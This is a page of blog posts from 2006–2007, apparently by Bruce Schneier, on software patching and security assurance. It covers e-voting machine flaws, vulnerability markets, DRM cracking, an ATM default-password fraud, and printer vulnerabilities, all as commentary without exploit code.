Entries Tagged "patching"

Page 10 of 12

Assurance

Over the past several months, the state of California conducted the most comprehensive security review yet of electronic voting machines. People I consider to be security experts analyzed machines from three different manufacturers, performing both a red-team attack analysis and a detailed source code review. Serious flaws were discovered in all machines and, as a result, the machines were all decertified for use in California elections.

The reports are worth reading, as is much of the blog commentary on the topic. The reviewers were given an unrealistic timetable and had trouble getting needed documentation. The fact that major security vulnerabilities were found in all machines is a testament to how poorly they were designed, not to the thoroughness of the analysis. Yet California Secretary of State Debra Bowen has conditionally recertified the machines for use, as long as the makers fix the discovered vulnerabilities and adhere to a lengthy list of security requirements designed to limit future security breaches and failures.

While this is a good effort, it has security completely backward. It begins with a presumption of security: If there are no known vulnerabilities, the system must be secure. If there is a vulnerability, then once it’s fixed, the system is again secure. How anyone comes to this presumption is a mystery to me. Is there any version of any operating system anywhere where the last security bug was found and fixed? Is there a major piece of software anywhere that has been, and continues to be, vulnerability-free?

Yet again and again we react with surprise when a system has a vulnerability. Last weekend at the hacker convention DefCon, I saw new attacks against supervisory control and data acquisition (SCADA) systems—those are embedded control systems found in infrastructure systems like fuel pipelines and power transmission facilities—electronic badge-entry systems, MySpace, and the high-security locks used in places like the White House. I will guarantee you that the manufacturers of these systems all claimed they were secure, and that their customers believed them.

Earlier this month, the government disclosed that the computer system of the US-Visit border control system is full of security holes. Weaknesses existed in all control areas and computing device types reviewed, the report said. How exactly is this different from any large government database? I’m not surprised that the system is so insecure; I’m surprised that anyone is surprised.

We’ve been assured again and again that RFID passports are secure. When researcher Lukas Grunwald successfully cloned one last year at DefCon, we were told there was little risk. This year, Grunwald revealed that he could use a cloned passport chip to sabotage passport readers. Government officials are again downplaying the significance of this result, although Grunwald speculates that this or another similar vulnerability could be used to take over passport readers and force them to accept fraudulent passports. Anyone care to guess who’s more likely to be right?

It’s all backward. Insecurity is the norm. If any system—whether a voting machine, operating system, database, badge-entry system, RFID passport system, etc.—is ever built completely vulnerability-free, it’ll be the first time in the history of mankind. It’s not a good bet.

Once you stop thinking about security backward, you immediately understand why the current software security paradigm of patching doesn’t make us any more secure. If vulnerabilities are so common, finding a few doesn’t materially reduce the quantity remaining. A system with 100 patched vulnerabilities isn’t more secure than a system with 10, nor is it less secure. A patched buffer overflow doesn’t mean that there’s one less way attackers can get into your system; it means that your design process was so lousy that it permitted buffer overflows, and there are probably thousands more lurking in your code.

Diebold Election Systems has patched a certain vulnerability in its voting-machine software twice, and each patch contained another vulnerability. Don’t tell me it’s my job to find another vulnerability in the third patch; it’s Diebold’s job to convince me it has finally learned how to patch vulnerabilities properly.

Several years ago, former National Security Agency technical director Brian Snow began talking about the concept of “assurance” in security. Snow, who spent 35 years at the NSA building systems at security levels far higher than anything the commercial world deals with, told audiences that the agency couldn’t use modern commercial systems with their backward security thinking. Assurance was his antidote:

Assurances are confidence-building activities demonstrating that:

  1. The system’s security policy is internally consistent and reflects the requirements of the organization,
  2. There are sufficient security functions to support the security policy,
  3. The system functions to meet a desired set of properties and only those properties,
  4. The functions are implemented correctly, and
  5. The assurances hold up through the manufacturing, delivery and life cycle of the system.

Basically, demonstrate that your system is secure, because I’m just not going to believe you otherwise.

Assurance is less about developing new security techniques than about using the ones we have. It’s all the things described in books like Building Secure Software, Software Security and Writing Secure Code. It’s some of what Microsoft is trying to do with its Security Development Lifecycle (SDL). It’s the Department of Homeland Security’s Build Security In program. It’s what every aircraft manufacturer goes through before it puts a piece of software in a critical role on an aircraft. It’s what the NSA demands before it purchases a piece of security equipment. As an industry, we know how to provide security assurance in software and systems; we just tend not to bother.

And most of the time, we don’t care. Commercial software, as insecure as it is, is good enough for most purposes. And while backward security is more expensive over the life cycle of the software, it’s cheaper where it counts: at the beginning. Most software companies are short-term smart to ignore the cost of never-ending patching, even though it’s long-term dumb.

Assurance is expensive, in terms of money and time for both the process and the documentation. But the NSA needs assurance for critical military systems; Boeing needs it for its avionics. And the government needs it more and more: for voting machines, for databases entrusted with our personal information, for electronic passports, for communications systems, for the computers and systems controlling our critical infrastructure. Assurance requirements should be common in IT contracts, not rare. It’s time we stopped thinking backward and pretending that computers are secure until proven otherwise.

This essay originally appeared on Wired.com.

Posted on August 9, 2007 at 8:19 AMView Comments

Florida E-Voting Study

Florida just recently released another study of the Diebold voting
machines. They—and it was real security researchers like the California study, and not posers—studied v4.6.5 of the Diebold TSx and v1.96.8 of the Diebold Optical Scan. (California studied older versions (v4.6.4 of the TSx and v1.96.6 of the Optical Scan).

The most interesting issues are (1) Diebold’s apparent “find- then-patch” approach to computer security, and (2) Diebold’s lousy use of cryptography.

Among the findings:

  • Section 3.5. They use RSA signatures, apparently to address previously documented flaws in the literature. But their signature verification step has a problem. It computes H = signature**3 mod N, and then compares _only 160 bits of H_ with the SHA1 hash of a message. This is a natural way to implement RSA signatures if you just read a security textbook. But this approach is also insecure—the report demonstrates how to create a 250-line Java program to forge RSA signatures over (basically) arbitrary messages of their choosing.
  • Section 3.10.3. The original Hopkins report talked about the lack of crypto for network (or dialup) communications between a TSX voting machine and the back-end GEMs server. Apparently, Diebold tried to use SSL to fix the problem. The RABA report analyzed Diebold’s SSL usage and found a security problem. Diebold then tried to patch their SSL implementation. This new report looks at the patched version, and finds that it is still vulnerable to a man-in-the-middle attack.
  • Section 3.7.1.1. Key management. Avi Rubin has already summarized some of the highlights.

    This is arguably worse than having a fixed static key in all of the machines. Because with knowledge of the machine’s serial number, anyone can calculate all of the secret keys. Whereas before, someone would have needed access to the source code or the binary in the machine.

    Other attacks mentioned in the report include swapping two candidate vote counters and many other vote switching attacks. The supervisor PIN is protected with weak cryptography, and once again Diebold has shown that they do not have even a basic understanding of how to apply cryptographic mechanisms.

Avi Rubin has a nice overall summary, too:

So, Diebold is doing some things better than they did before when they had absolutely no security, but they have yet to do them right. Anyone taking any of our cryptography classes at Johns Hopkins, for example, would do a better job applying cryptography. If you read the SAIT report, this theme repeats throughout.

Right. These are classic examples of problems that can arise if (1) you “roll your own” crypto and/or (2) employ “find and patch” rather than a principled approach to security.

It all makes me wonder what new problems will arise from future security patches.

The good news is that Florida has decided not to certify the TSX at this time. They may try to certify a revised version of the OS (optical scan) system.

Posted on August 6, 2007 at 6:34 AMView Comments

Business Models for Discovering Security Vulnerabilities

One company sells them to the vendors:

The founder of a small Moscow security company, Gleg, Legerov scrutinizes computer code in commonly used software for programming bugs, which attackers can use to break into computer systems, and sends his findings to a few dozen corporate customers around the world. Each customer pays more than $10,000 for information it can use to plug the hidden holes in its computers and stay ahead of criminal hackers.

iDefensebuys them:

This month, iDefense, a Virginia- based subsidiary of the technology company VeriSign, began offering an $8,000 bounty to the first six researchers to find holes in Vista or the newest version of Internet Explorer, and up to $4,000 more for code that take can advantage of the weaknesses. Like Gleg, iDefense, will sell information about those vulnerabilities to companies and government agencies for an undisclosed amount, though iDefense makes it a practice to alert vendors like Microsoft first.

So do criminals:

But the iDefense rewards are low compared to bounties offered on the black market. In December, the Japanese antivirus company TrendMicro found a Vista vulnerability being offered by an anonymous hacker on a Romanian Web forum for $50,000.”

There’s a lot of FUD in this article, but also some good stuff.

Posted on February 5, 2007 at 12:44 PMView Comments

Firefox JavaScript Flaw: Real or Hoax?

Two hackers—Mischa Spiegelmock and Andrew Wbeelsoi—have announced a flaw in Firefox’s JavaScript:

An attacker could commandeer a computer running the browser simply by crafting a Web page that contains some malicious JavaScript code, Mischa Spiegelmock and Andrew Wbeelsoi said in a presentation at the ToorCon hacker conference here. The flaw affects Firefox on Windows, Apple Computer’s Mac OS X and Linux, they said.

More interesting was this piece:

The hackers claim they know of about 30 unpatched Firefox flaws. They don’t plan to disclose them, instead holding onto the bugs.

Jesse Ruderman, a Mozilla security staffer, attended the presentation and was called up on the stage with the two hackers. He attempted to persuade the presenters to responsibly disclose flaws via Mozilla’s bug bounty program instead of using them for malicious purposes such as creating networks of hijacked PCs, called botnets.

“I do hope you guys change your minds and decide to report the holes to us and take away $500 per vulnerability instead of using them for botnets,” Ruderman said.

The two hackers laughed off the comment. “It is a double-edged sword, but what we’re doing is really for the greater good of the Internet. We’re setting up communication networks for black hats,” Wbeelsoi said.

Sounds pretty bad? But maybe it’s all a hoax:

Spiegelmock, a developer at Six Apart, a blog software company in San Francisco, now says the ToorCon talk was meant “to be humorous” and insists the code presented at the conference cannot result in code execution.

Spiegelmock’s strange about-face comes as Mozilla’s security response team is racing to piece together information from the ToorCon talk to figure out how to fix the issue.

[…]

On the claim that there are 30 undisclosed Firefox vulnerabilities, Spiegelmock pinned that entirely on co-presenter Wbeelsoi. “I have no undisclosed Firefox vulnerabilities. The person who was speaking with me made this claim, and I honestly have no idea if he has them or not. I apologize to everyone involved, and I hope I have made everything as clear as possible,” Spiegelmock added.

I vote: hoax, with maybe some seeds of real.

Posted on October 4, 2006 at 7:04 AMView Comments

FairUse4WM News

A couple of weeks I ago I wrote about the battle between Microsoft’s DRM system and FairUse4WM, which breaks it. The news for this week is that Microsoft has patched their security against FairUseWM 1.2 and filed a lawsuit against the program’s anonymous authors, and those same anonymous authors have released FairUse4WM 1.3, which breaks the latest Microsoft patch.

We asked Viodentia about Redmond’s accusation that he and/or his associates broke into its systems in order to obtain the IP necessary to crack PlaysForSure; Vio replied that he’s “utterly shocked” by the charge. “I didn’t use any Microsoft source code. However, I believe that this lawsuit is a fishing expedition to get identity information, which can then be used to either bring more targeted lawsuits, or to cause other trouble.” We’re sure Microsoft would like its partners and the public to think that its DRM is generally infallible and could only be cracked by stealing its IP, so Viodentia’s conclusion about its legal tactics seems pretty fair, obvious, and logical to us.

What’s interesting about this continuing saga is how different it is from the normal find-vulnerability-then-patch sequence. The authors of FairUse4WM aren’t finding bugs and figuring out how to exploit them, forcing Microsoft to patch them. This is a sequence of crack, fix, re-crack, re-fix, etc.

The reason we’re seeing this—and this is going to be the norm for DRM systems—is that DRM is fundamentally an impossible problem. Making it work at all involves tricks, and breaking DRM is akin to “fixing” the software so the tricks don’t work. Anyone looking for a demonstation that technical DRM is doomed should watch this story unfold. (If Microsoft has any chance of winning at all, it’s via the legal route.)

Posted on September 28, 2006 at 12:55 PMView Comments

Programming ATMs to Believe $20 Bills Are $5 Bills

Clever attack:

Last month, a man reprogrammed an automated teller machine at a gas station on Lynnhaven Parkway to spit out four times as much money as it should.

He then made off with an undisclosed amount of cash.

No one noticed until nine days later, when a customer told the clerk at a Crown gas station that the machine was disbursing more money than it should. Police are now investigating the incident as fraud.

Police spokeswoman Rene Ball said the first withdrawal occurred at 6:17 p.m. Aug. 19. Surveillance footage documented a man about 5-foot-8 with a thin build walking into the gas station on the 2400 block of Lynnhaven Parkway and swiping an ATM card.

The man then punched a series of numbers on the machine’s keypad, breaking the security code. The ATM was programmed to disburse $20 bills. The man reprogrammed the machine so it recorded each $20 bill as a $5 debit to his account.

The suspect returned to the gas station a short time later and took more money, but authorities did not say how much. Because the account was pre-paid and the card could be purchased at several places, police are not sure who is behind the theft.

What’s weird is that it seems that this is easy. The ATM is a Tranax Mini Bank 1500. And you can buy the manuals from the Tranax website. And they’re useful for this sort of thing:

I am holding in my hands a legitimately obtained copy of the manual. There are a lot of security sensitive things inside of this manual. As promised, I am not going to reveal them, but there are:

  • Instructions on how to enter the diagnostic mode
  • Default passwords

  • Default Combinations For the Safe

Do not ask me for them. If you maintain one of these devices, make sure that you are not using the default password. If you are, change it immediately.

This is from an eWeek article:

“If you get your hand on this manual, you can basically reconfigure the ATM if the default password was not changed. My guess is that most of these mini-bank terminals are sitting around with default passwords untouched,” Goldsmith said.

Officials at Tranax did not respond to eWEEK requests for comment. According to a note on the company’s Web site, Tranax has shipped 70,000 ATMs, self-service terminals and transactional kiosks around the country. The majority of those shipments are of the flagship Mini-Bank 1500 machine that was rigged in the Virginia Beach heist.

So, as long as you can use an account that’s not traceable back to you, and you disguise yourself for the ATM cameras, this is a pretty easy crime.

eWeek claims you can get a copy of the manual simply by Googling for it. (Here’s one on eBay.

And Tranax is promising a fix that will force operators to change the default passwords. But honestly, what’s the liklihood that someone who can’t be bothered to change the default password will take the time to install a software patch?

EDITED TO ADD (9/22): Here’s the manual.

Posted on September 22, 2006 at 7:04 AMView Comments

Microsoft and FairUse4WM

If you really want to see Microsoft scramble to patch a hole in its software, don’t look to vulnerabilities that impact countless Internet Explorer users or give intruders control of thousands of Windows machines. Just crack Redmond’s DRM.

Security patches used to be rare. Software vendors were happy to pretend that vulnerabilities in their products were illusory—and then quietly fix the problem in the next software release.

That changed with the full disclosure movement. Independent security researchers started going public with the holes they found, making vulnerabilities impossible for vendors to ignore. Then worms became more common; patching—and patching quickly—became the norm.

But even now, no software vendor likes to issue patches. Every patch is a public admission that the company made a mistake. Moreover, the process diverts engineering resources from new development. Patches annoy users by making them update their software, and piss them off even more if the update doesn’t work properly.

For the vendor, there’s an economic balancing act: how much more will your users be annoyed by unpatched software than they will be by the patch, and is that reduction in annoyance worth the cost of patching?

Since 2003, Microsoft’s strategy to balance these costs and benefits has been to batch patches: instead of issuing them one at a time, it’s been issuing them all together on the second Tuesday of each month. This decreases Microsoft’s development costs and increases the reliability of its patches.

The user pays for this strategy by remaining open to known vulnerabilities for up to a month. On the other hand, users benefit from a predictable schedule: Microsoft can test all the patches that are going out at the same time, which means that patches are more reliable and users are able to install them faster with more confidence.

In the absence of regulation, software liability, or some other mechanism to make unpatched software costly for the vendor, “Patch Tuesday” is the best users are likely to get.

Why? Because it makes near-term financial sense to Microsoft. The company is not a public charity, and if the internet suffers, or if computers are compromised en masse, the economic impact on Microsoft is still minimal.

Microsoft is in the business of making money, and keeping users secure by patching its software is only incidental to that goal.

There’s no better example of this of this principle in action than Microsoft’s behavior around the vulnerability in its digital rights management software PlaysForSure.

Last week, a hacker developed an application called FairUse4WM that strips the copy protection from Windows Media DRM 10 and 11 files.

Now, this isn’t a “vulnerability” in the normal sense of the word: digital rights management is not a feature that users want. Being able to remove copy protection is a good thing for some users, and completely irrelevant for everyone else. No user is ever going to say: “Oh no. I can now play the music I bought for my computer in my car. I must install a patch so I can’t do that anymore.”

But to Microsoft, this vulnerability is a big deal. It affects the company’s relationship with major record labels. It affects the company’s product offerings. It affects the company’s bottom line. Fixing this “vulnerability” is in the company’s best interest; never mind the customer.

So Microsoft wasted no time; it issued a patch three days after learning about the hack. There’s no month-long wait for copyright holders who rely on Microsoft’s DRM.

This clearly demonstrates that economics is a much more powerful motivator than security.

It should surprise no one that the system didn’t stay patched for long. FairUse4WM 1.2 gets around Microsoft’s patch, and also circumvents the copy protection in Windows Media DRM 9 and 11beta2 files.

That was Saturday. Any guess on how long it will take Microsoft to patch Media Player once again? And then how long before the FairUse4WM people update their own software?

Certainly much less time than it will take Microsoft and the recording industry to realize they’re playing a losing game, and that trying to make digital files uncopyable is like trying to make water not wet.

If Microsoft abandoned this Sisyphean effort and put the same development effort into building a fast and reliable patching system, the entire internet would benefit. But simple economics says it probably never will.

This essay originally appeared on Wired.com.

EDITED TO ADD (9/8): Commentary.

EDITED TO ADD (9/9): Microsoft released a patch for FairUse4WM 1.2 on Thursday, September 7th.

EDITED TO ADD (9/13): BSkyB halts download service because of the breaks.

EDITED TO ADD (9/16): Microsoft is threatening legal action against people hosting copies of FairUse4WM.

Posted on September 7, 2006 at 8:33 AMView Comments

Faux Disclosure

Good essay on “faux disclosure”: disclosing a vulnerability without really disclosing it.

You’ve probably heard of full disclosure, the security philosophy that calls for making public all details of vulnerabilities. It has been the subject of debates among
researchers, vendors, and security firms. But the story that grabbed most of the headlines at the Black Hat Briefings in Las Vegas last week was based on a different type of disclosure. For lack of a better name, I’ll call it faux disclosure. Here’s why.

Security researchers Dave Maynor of ISS and Johnny Cache—a.k.a. Jon Ellch—demonstrated an exploit that allowed them to install a rootkit on an Apple laptop in less than a minute. Well, sort of; they showed a video of it, and also noted that they’d used a third-party Wi-Fi card in the demo of the exploit, rather than the MacBook’s internal Wi-Fi card. But they said that the exploit would work whether the third-party card—which they declined to identify—was inserted
in a Mac, Windows, or Linux laptop.

[…]

How is that for murky and non-transparent? The whole world is at risk—if the exploit is real—whenever the unidentified card is used. But they won’t say which card, although many sources presume the card is based on the Atheros chipset, which Apple employs.

It gets worse. Brian Krebs of the Washington Post, who first reported on the exploit, updated his original story and has reported that Maynor said, “Apple had leaned on Maynor and Ellch pretty hard not to make this an issue about the Mac drivers—mainly because Apple had not fixed the problem yet.”

That’s part of what is meant by full disclosure these days—giving the vendor a chance fix the vulnerability before letting the whole world know about it. That way, the thinking goes, the only people who get hurt by it are the people who get exploited by it. But damage to the responsible vendor’s image is mitigated somewhat, and many in the security business seem to think that damage control is more important than anything that might happen to any of the vendor’s customers.

Big deal. Publicly traded corporations like Apple and Microsoft and all the rest have been known to ignore ethics, morality, any consideration of right or wrong, or anything at all that might divert them from their ultimate goal: to maximize profits. Because of this,
some corporations only speak the truth when it is in their best interest. Otherwise, they lie or maintain silence.

Full disclosure is the only thing that forces vendors to fix security problems. The further we move away from full disclosure, the less incentive vendors have to fix problems and the more at-risk we all are.

Posted on August 14, 2006 at 1:41 PMView Comments

Printer Security

At BlackHat last week, Brendan O’Connor warned about the dangers of insecure printers:

“Stop treating them as printers. Treat them as servers, as workstations,” O’Connor said in his presentation on Thursday. Printers should be part of a company’s patch program and be carefully managed, not forgotten by IT and handled by the most junior person on staff, he said.

I remember the L0pht doing work on printer vulnerabilities, and ways to attack networks via the printers, years ago. But the point is still valid and bears repeating: printers are computers, and have vulnerabilities like any other computers.

Once a printer was under his control, O’Connor said he would be able to use it to map an organization’s internal network—a situation that could help stage further attacks. The breach gave him access to any of the information printed, copied or faxed from the device. He could also change the internal job counter—which can reduce, or increase, a company’s bill if the device is leased, he said.

The printer break-in also enables a number of practical jokes, such as sending print and scan jobs to arbitrary workers’ desktops, O’Connor said. Also, devices could be programmed to include, for example, an image of a paper clip on every print, fax or copy, ultimately driving office staffers to take the machine apart looking for the paper clip.

Getting copies of all printed documents is definitely a security vulnerability, but I think the biggest threat is that the printers are inside the network, and are a more-trusted launching pad for onward attacks.

One of the weaknesses in the Xerox system is an unsecured boot loader, the technology that loads the basic software on the device, O’Connor said. Other flaws lie in the device’s Web interface and in the availability of services such as the Simple Network Management Protocol and Telnet, he said.

O’Connor informed Xerox of the problems in January. The company did issue a fix for its WorkCentre 200 series, it said in a statement. “Thanks to Brendan’s efforts, we were able to post a patch for our customers in mid-January which fixes the issues,” a Xerox representative said in an e-mailed statement.

One of the reasons this is a particularly nasty problem is that people don’t update their printer software. Want to bet approximately 0% of the printer’s users installed that patch? And what about printers whose code can’t be patched?

EDITED TO ADD (8/7): O’Connor’s name corrected.

Posted on August 7, 2006 at 10:59 AMView Comments

Sidebar photo of Bruce Schneier by Joe MacInnis.